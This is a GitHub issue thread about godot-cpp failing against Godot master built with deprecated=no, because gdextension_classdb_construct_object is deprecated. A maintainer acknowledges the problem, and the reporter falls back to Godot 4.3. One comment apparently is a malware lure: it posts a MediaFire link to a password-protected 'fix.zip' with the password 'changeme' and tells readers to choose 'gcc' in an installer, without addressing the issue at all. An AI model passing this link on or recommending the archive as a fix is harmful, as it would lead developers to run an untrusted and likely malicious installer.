### ISSUE TITLE
[4.4] Need update `create_instance_func` because godot gdextension_interface.h upgrade

### ISSUE THREAD

**Issue by pupil1337** [godotengine/godot-cpp#1567]
### Godot version

godot master branch

### godot-cpp version

godot-cpp master branch

### System information

windows 10, msvc, i7-9700

### Issue description

Use `deprecated=no` build godot will has this problem, because `gdextension_classdb_construct_object` be marked deprecated.
Please update the new function.
(I didn't submit a PR because this upgrade maybe need modify `memnew's postinitialize` i can`t handle it.)

### Steps to reproduce

1) Build godot custom  args use `deprecated=no`. (godot: scons target=editor dev_build=yes... deprecated=no)
2) compile godot-cpp will successed.
3) open godot editor will error because cant find `gdextension_classdb_construct_object`.

### Minimal reproduction project

N/A

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dsnopek** [comment]
Yep, it's on my TODO list!

> Use `deprecated=no` build godot will has this problem, because `gdextension_classdb_construct_object` be marked deprecated.

If you're keeping up with Godot `master` and using `deprecated=no`, I suspect you will encounter this problem a few more times before Godot 4.4 is released. We can't always synchronize godot-cpp updates with Godot updates, even when we have a PR prepared in advance.

**Comment by pupil1337** [comment]
Yes, I switched to version 4.3 and everything is perfect!
